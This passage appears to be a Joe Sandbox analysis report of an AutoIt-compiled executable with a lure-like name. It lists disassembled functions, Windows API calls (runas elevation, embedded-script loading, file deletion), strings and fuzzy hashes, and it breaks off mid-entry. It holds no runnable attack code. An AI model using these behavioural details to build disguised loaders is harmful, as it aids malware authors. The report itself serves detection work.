                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 000F2232
                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0011DAA4), ref: 000F2290
                            • ShellExecuteW.SHELL32(00000000), ref: 000F2297
                              • Part of subcall function 000830A5: GetSysColorBrush.USER32(0000000F), ref: 000830B0
                              • Part of subcall function 000830A5: LoadCursorW.USER32(00000000,00007F00), ref: 000830BF
                              • Part of subcall function 000830A5: LoadIconW.USER32(00000063), ref: 000830D5
                              • Part of subcall function 000830A5: LoadIconW.USER32(000000A4), ref: 000830E7
                              • Part of subcall function 000830A5: LoadIconW.USER32(000000A2), ref: 000830F9
                              • Part of subcall function 000830A5: RegisterClassExW.USER32(?), ref: 00083167
                              • Part of subcall function 00082E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00082ECB
                              • Part of subcall function 00082E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00082EEC
                              • Part of subcall function 00082E9D: ShowWindow.USER32(00000000), ref: 00082F00
                              • Part of subcall function 00082E9D: ShowWindow.USER32(00000000), ref: 00082F09
                              • Part of subcall function 00083598: _memset.LIBCMT ref: 000835BE
                              • Part of subcall function 00083598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00083667
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                            • String ID: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                            • API String ID: 4253510256-1219970503
                            • Opcode ID: 5034d0e7d815cf32e835f87d79d7d01b55533737861527e1554761e2aa32b296
                            • Instruction ID: 3d0561ae779ea26810bac27673b2f5fe15ac0075e5bba3e9b218574db01fa2c4
                            • Opcode Fuzzy Hash: 5034d0e7d815cf32e835f87d79d7d01b55533737861527e1554761e2aa32b296
                            • Instruction Fuzzy Hash: 2951B678644248BADB10BBB4EC46FED3B78BB55F14F000055F7C1A65A2DBB04AC5DB62

                            Control-flow Graph

                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 0009E4A7
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • GetCurrentProcess.KERNEL32(00000000,0011DC28,?,?), ref: 0009E567
                            • GetNativeSystemInfo.KERNEL32(?,0011DC28,?,?), ref: 0009E5BC
                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0009E5C7
                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0009E5DA
                            • GetSystemInfo.KERNEL32(?,0011DC28,?,?), ref: 0009E5E4
                            • GetSystemInfo.KERNEL32(?,0011DC28,?,?), ref: 0009E5F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                            • String ID:
                            • API String ID: 2717633055-0
                            • Opcode ID: c92f10a0652f75cddba9f0cbc1d1fbaebae3987ec4057b080570a8d07c3bca07
                            • Instruction ID: 05c570673896b382955213ee6cfa2ce6fe146245b518e049f03a08069b9d372e
                            • Opcode Fuzzy Hash: c92f10a0652f75cddba9f0cbc1d1fbaebae3987ec4057b080570a8d07c3bca07
                            • Instruction Fuzzy Hash: A66190B18093C4DBCF15CF68D8C11ED7FA46F2A304F1A45D9D8889B24BD674CA48DB66

                            Control-flow Graph

                            Control-flow graph for the function starting at 831f2 (rendered graph image omitted; the graph nodes call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource)
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00083202
                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00083219
                            • LoadResource.KERNEL32(?,00000000), ref: 000F57D7
                            • SizeofResource.KERNEL32(?,00000000), ref: 000F57EC
                            • LockResource.KERNEL32(?), ref: 000F57FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                            • String ID: SCRIPT
                            • API String ID: 3051347437-3967369404
                            • Opcode ID: af64eb8e78231516eb4c19670d8d18a8817c9b07c422cb6b83d551c55aaf7200
                            • Instruction ID: f9c6e11b7b532631e7c72495895fe1f76c22c90fd5818989cee4511ec4b35e27
                            • Opcode Fuzzy Hash: af64eb8e78231516eb4c19670d8d18a8817c9b07c422cb6b83d551c55aaf7200
                            • Instruction Fuzzy Hash: 96117C74200701BFE721ABA5FC48F27BBB9FBC9B41F108068F58286560DBB1DD008B60
                            APIs
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                            • _memmove.LIBCMT ref: 00092C63
                            • _memmove.LIBCMT ref: 0009303A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID: @
                            • API String ID: 1300846289-2766056989
                            • Opcode ID: fca705b9b42d05d934f22a5d17b6c938196217cdfa872c62b27280982f9b9de5
                            • Instruction ID: 69380a87acdbf3b616945061e7e1c606ad9f10ec63c2fa25e4b5f18151cb436b
                            • Opcode Fuzzy Hash: fca705b9b42d05d934f22a5d17b6c938196217cdfa872c62b27280982f9b9de5
                            • Instruction Fuzzy Hash: 49C25C74A04209AFCF24DF94C491AEDB7F1BF49300F24806AE945AB352D735EE85EB91
                            APIs
                            • GetFileAttributesW.KERNEL32(0008C848,0008C848), ref: 0009DDA2
                            • FindFirstFileW.KERNEL32(0008C848,?), ref: 000F4A83
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$AttributesFindFirst
                            • String ID:
                            • API String ID: 4185537391-0
                            • Opcode ID: 3d7f5b1609c400ce2e61d41db00f3fd8791d32e1e1e638ffbe7fd60c209304f6
                            • Instruction ID: 5e3c9e0e5970b61f72addf5adef5f1584667f55f09bd108a4f8d638de14e70de
                            • Opcode Fuzzy Hash: 3d7f5b1609c400ce2e61d41db00f3fd8791d32e1e1e638ffbe7fd60c209304f6
                            • Instruction Fuzzy Hash: 4CE0D8314154055786246778EC0D8FA379C9B05338B100746F975C14E0EBB49D8095D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID:
                            • API String ID: 3964851224-0
                            • Opcode ID: 4b0ba90ff0599694084ce209053299d25dd29a3017db74be28374ef4521facc8
                            • Instruction ID: e661e944b208d203af5056a22d2eac2d6c0ca49e73252e944aa7b3323e3000ec
                            • Opcode Fuzzy Hash: 4b0ba90ff0599694084ce209053299d25dd29a3017db74be28374ef4521facc8
                            • Instruction Fuzzy Hash: D89279B06083419FDB24DF18C494B6AB7E0BF89304F14885DF99A8B3A2D771ED45DB52
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0008E279
                            • timeGetTime.WINMM ref: 0008E51A
                            • TranslateMessage.USER32(?), ref: 0008E646
                            • DispatchMessageW.USER32(?), ref: 0008E651
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0008E664
                            • LockWindowUpdate.USER32(00000000), ref: 0008E697
                            • DestroyWindow.USER32 ref: 0008E6A3
                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008E6BD
                            • Sleep.KERNEL32(0000000A), ref: 000F5B15
                            • TranslateMessage.USER32(?), ref: 000F62AF
                            • DispatchMessageW.USER32(?), ref: 000F62BD
                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000F62D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                            • API String ID: 2641332412-570651680
                            • Opcode ID: bc4f2d1388b53dc9d317cfb25720ea08b5714d15194ca737abd150d5709046c6
                            • Instruction ID: 07a516db7a2fa7e93520e8f5dd177604f519bdf70cbd72569f0cfe46e8171c49
                            • Opcode Fuzzy Hash: bc4f2d1388b53dc9d317cfb25720ea08b5714d15194ca737abd150d5709046c6
                            • Instruction Fuzzy Hash: 2B6202705043849FDB24EF64CC85BAA77E4BF45304F14097DFA8A8B6A2DBB1D884DB52
                            APIs
                            • ___createFile.LIBCMT ref: 000B6C73
                            • ___createFile.LIBCMT ref: 000B6CB4
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B6CDD
                            • __dosmaperr.LIBCMT ref: 000B6CE4
                            • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B6CF7
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B6D1A
                            • __dosmaperr.LIBCMT ref: 000B6D23
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B6D2C
                            • __set_osfhnd.LIBCMT ref: 000B6D5C
                            • __lseeki64_nolock.LIBCMT ref: 000B6DC6
                            • __close_nolock.LIBCMT ref: 000B6DEC
                            • __chsize_nolock.LIBCMT ref: 000B6E1C
                            • __lseeki64_nolock.LIBCMT ref: 000B6E2E
                            • __lseeki64_nolock.LIBCMT ref: 000B6F26
                            • __lseeki64_nolock.LIBCMT ref: 000B6F3B
                            • __close_nolock.LIBCMT ref: 000B6F9B
                              • Part of subcall function 000AF84C: CloseHandle.KERNEL32(00000000,0012EEC4,00000000,?,000B6DF1,0012EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AF89C
                              • Part of subcall function 000AF84C: GetLastError.KERNEL32(?,000B6DF1,0012EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AF8A6
                              • Part of subcall function 000AF84C: __free_osfhnd.LIBCMT ref: 000AF8B3
                              • Part of subcall function 000AF84C: __dosmaperr.LIBCMT ref: 000AF8D5
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            • __lseeki64_nolock.LIBCMT ref: 000B6FBD
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B70F2
                            • ___createFile.LIBCMT ref: 000B7111
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000B711E
                            • __dosmaperr.LIBCMT ref: 000B7125
                            • __free_osfhnd.LIBCMT ref: 000B7145
                            • __invoke_watson.LIBCMT ref: 000B7173
                            • __wsopen_helper.LIBCMT ref: 000B718D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                            • String ID: 9A$@
                            • API String ID: 3896587723-3273144146
                            • Opcode ID: cef9af26a4bdabd1fe27774a9d8f42d6983b3ca27060ae1321461d565734fb91
                            • Instruction ID: 433e4a87096c47d33c0f11115852c2458f35126c567e4217551a7caf1e255c4b
                            • Opcode Fuzzy Hash: cef9af26a4bdabd1fe27774a9d8f42d6983b3ca27060ae1321461d565734fb91
                            • Instruction Fuzzy Hash: 062227719041069BEF259FA8DC51BFE7BB1EB05324F244229E525AB2E2CB3ECD90C751

                            Control-flow Graph

                            Control-flow graph for the function starting at d01e4 (rendered graph image omitted; the graph nodes contain only internal subroutine calls and no direct Windows API calls)
                            APIs
                            • _wcscpy.LIBCMT ref: 000D026A
                            • _wcschr.LIBCMT ref: 000D0278
                            • _wcscpy.LIBCMT ref: 000D028F
                            • _wcscat.LIBCMT ref: 000D029E
                            • _wcscat.LIBCMT ref: 000D02BC
                            • _wcscpy.LIBCMT ref: 000D02DD
                            • __wsplitpath.LIBCMT ref: 000D03BA
                            • _wcscpy.LIBCMT ref: 000D03DF
                            • _wcscpy.LIBCMT ref: 000D03F1
                            • _wcscpy.LIBCMT ref: 000D0406
                            • _wcscat.LIBCMT ref: 000D041B
                            • _wcscat.LIBCMT ref: 000D042D
                            • _wcscat.LIBCMT ref: 000D0442
                              • Part of subcall function 000CC890: _wcscmp.LIBCMT ref: 000CC92A
                              • Part of subcall function 000CC890: __wsplitpath.LIBCMT ref: 000CC96F
                              • Part of subcall function 000CC890: _wcscpy.LIBCMT ref: 000CC982
                              • Part of subcall function 000CC890: _wcscat.LIBCMT ref: 000CC995
                              • Part of subcall function 000CC890: __wsplitpath.LIBCMT ref: 000CC9BA
                              • Part of subcall function 000CC890: _wcscat.LIBCMT ref: 000CC9D0
                              • Part of subcall function 000CC890: _wcscat.LIBCMT ref: 000CC9E3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                            • String ID: >>>AUTOIT SCRIPT<<<
                            • API String ID: 2955681530-2806939583
                            • Opcode ID: 98eb9b911abc133275ba5ca5de3ba21625618542a1b17cdfd4f9b486992a1856
                            • Instruction ID: 4523d065ad966b2813675f7afc126e654ea69d4c6493263e7f6c26c7ee985c04
                            • Opcode Fuzzy Hash: 98eb9b911abc133275ba5ca5de3ba21625618542a1b17cdfd4f9b486992a1856
                            • Instruction Fuzzy Hash: E1918F72504701AFCB24EB50C955FDBB3E8BF84310F04885EF5899B252EB34EA44CB62

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 00082F8B
                            • RegisterClassExW.USER32(00000030), ref: 00082FB5
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00082FC6
                            • InitCommonControlsEx.COMCTL32(?), ref: 00082FE3
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00082FF3
                            • LoadIconW.USER32(000000A9), ref: 00083009
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00083018
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3So
                            • API String ID: 2914291525-1322758227
                            • Opcode ID: a6209d7378351a8d4caab5aa7410d6063041e8c96ee09df34d9eaaaaa70962ee
                            • Instruction ID: 1f38ac0ace676fe0a8a7da0ec13d8f5671fd25e58198ba1dd713700293d6eb5d
                            • Opcode Fuzzy Hash: a6209d7378351a8d4caab5aa7410d6063041e8c96ee09df34d9eaaaaa70962ee
                            • Instruction Fuzzy Hash: 0421C0B9900319AFDB009FE4E889BCEBBF4FB09704F00461AF655A66A0D7B545C4CF91

                            Control-flow Graph

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,00000000,00000001,00000000), ref: 0008428C
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 000A1BC7: __wcsicmp_l.LIBCMT ref: 000A1C50
                            • _wcscpy.LIBCMT ref: 000843C0
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 000F214E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe$CMDLINE$CMDLINERAW
                            • API String ID: 861526374-3044170080
                            • Opcode ID: d469afee65a75165e304875047090a0becf73ea50ecdd810000cdde733f91bb5
                            • Instruction ID: 59260b0247a9afd1808c68ed674a9b88c15a75f3fcf71d43c871355b0acfc02e
                            • Opcode Fuzzy Hash: d469afee65a75165e304875047090a0becf73ea50ecdd810000cdde733f91bb5
                            • Instruction Fuzzy Hash: FE816E7690011AAADB15FBE0DD52EEF7BB8BF15750F200025F582B7092EB706B44CBA1

                            Control-flow Graph

                            Control-flow graph for the function starting at cc890 (rendered graph image omitted; the graph nodes call DeleteFileW and CopyFileW)
                            APIs
                              • Part of subcall function 000CC6A0: __time64.LIBCMT ref: 000CC6AA
                              • Part of subcall function 000841A7: _fseek.LIBCMT ref: 000841BF
                            • __wsplitpath.LIBCMT ref: 000CC96F
                              • Part of subcall function 000A297D: __wsplitpath_helper.LIBCMT ref: 000A29BD
                            • _wcscpy.LIBCMT ref: 000CC982
                            • _wcscat.LIBCMT ref: 000CC995
                            • __wsplitpath.LIBCMT ref: 000CC9BA
                            • _wcscat.LIBCMT ref: 000CC9D0
                            • _wcscat.LIBCMT ref: 000CC9E3
                              • Part of subcall function 000CC6E4: _memmove.LIBCMT ref: 000CC71D
                              • Part of subcall function 000CC6E4: _memmove.LIBCMT ref: 000CC72C
                            • _wcscmp.LIBCMT ref: 000CC92A
                              • Part of subcall function 000CCE59: _wcscmp.LIBCMT ref: 000CCF49
                              • Part of subcall function 000CCE59: _wcscmp.LIBCMT ref: 000CCF5C
                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CCB8D
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CCC24
                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CCC3A
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CCC4B
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CCC5D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                            • String ID:
                            • API String ID: 152968663-0
                            • Opcode ID: c951f673f7cba6a76e32346a8329a6dce3d2fb1e90dd963553544932f58e95e8
                            • Instruction ID: b9827bea43cdcfbd361adf98b99f019fe37548ebb243a84914e2b562e5079f20
                            • Opcode Fuzzy Hash: c951f673f7cba6a76e32346a8329a6dce3d2fb1e90dd963553544932f58e95e8
                            • Instruction Fuzzy Hash: A7C11AB1D00129AADF10DFA5CC85FDEBBB9AF59314F0040AAF609E6152DB709A84CF65

                            Control-flow Graph

                            Control-flow graph for the function starting at 9e975 (rendered graph image omitted; the graph nodes call GetModuleFileNameW)
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0009EA39
                            • __wsplitpath.LIBCMT ref: 0009EA56
                              • Part of subcall function 000A297D: __wsplitpath_helper.LIBCMT ref: 000A29BD
                            • _wcsncat.LIBCMT ref: 0009EA69
                            • __makepath.LIBCMT ref: 0009EA85
                              • Part of subcall function 000A2BFF: __wmakepath_s.LIBCMT ref: 000A2C13
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                            • _wcscpy.LIBCMT ref: 0009EABE
                              • Part of subcall function 0009EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0009EADA,?,?), ref: 0009EB27
                            • _wcscat.LIBCMT ref: 000F32FC
                            • _wcscat.LIBCMT ref: 000F3334
                            • _wcsncpy.LIBCMT ref: 000F3370
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                            • String ID: Include$\
                            • API String ID: 1213536620-3429789819
                            • Opcode ID: 775e714229d5e2182a56a60c8684644beba80e8b86a9d98342ef7d4cc84c8ba9
                            • Instruction ID: 8d815d8a0e0e2a1adc3e575c2a3e6d4903b2a1a701e373d8f17908daf06bcad0
